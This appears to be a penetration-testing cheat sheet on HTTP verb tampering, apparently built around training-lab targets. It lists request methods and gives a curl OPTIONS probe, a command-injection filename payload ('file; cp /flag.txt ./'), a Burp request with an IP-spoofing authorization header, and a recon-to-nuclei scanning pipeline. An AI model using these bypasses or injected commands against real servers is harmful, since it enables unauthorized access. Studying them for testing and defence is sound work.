HTTP Verb Tampering

Verb

Description

HEAD

Identical to a GET request, but its response only contains the headers, without the response body

PUT

Writes the request payload to the specified location

DELETE

Deletes the resource at the specified location

OPTIONS

Shows different options accepted by a web server, like accepted HTTP verbs

PATCH

Apply partial modifications to the resource at the specified location

All methods: https://github.com/OWASP/AppSec-Browser-Bundle/blob/master/utilities/wfuzz/wordlist/fuzzdb/attack-payloads/http-protocol/http-protocol-methods.txt

OPTIONS
GET
HEAD
POST
PUT
DELETE
TRACE
TRACK
CONNECT
PROPFIND
PROPPATCH
MKCOL
COPY
MOVE
LOCK
UNLOCK
VERSION-CONTROL
REPORT
CHECKOUT
CHECKIN
UNCHECKOUT
MKWORKSPACE
UPDATE
LABEL
MERGE
BASELINE-CONTROL
MKACTIVITY
ORDERPATCH
ACL
PATCH
SEARCH
ARBITRARY

Bypassing Basic Authentication

curl -i -X OPTIONS http://SERVER_IP:PORT/

HTTP/1.1 200 OK
Date: 
Server: Apache/2.4.41 (Ubuntu)
Allow: POST,OPTIONS,HEAD,GET
Content-Length: 0
Content-Type: httpd/unix-directory

Bypassing Security Filters

special char: test;

file; cp /flag.txt ./

Intercept the request in Burp Suite (Burp) and then use Change Request Method

OPTIONS

TRACK /upload.php HTTP/1.1

Host: dev.inlanefreight.local

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

X-Custom-IP-Authorization: 127.0.0.1

Content-Length: 0

TRACE Enable

Making desync attacks easy with TRACE

Misconfigured PUT Method

cat targets.txt | assetfinder -subs-only | httpx -silent -p 80,443,8080,8443,9000,9001,9002,9003 -nc  | nuclei -t severity high -silent | tee -a BugsFound.txt

PreviousMarkdown injection NextHTTP Header Exploitation

Last updated 3 months ago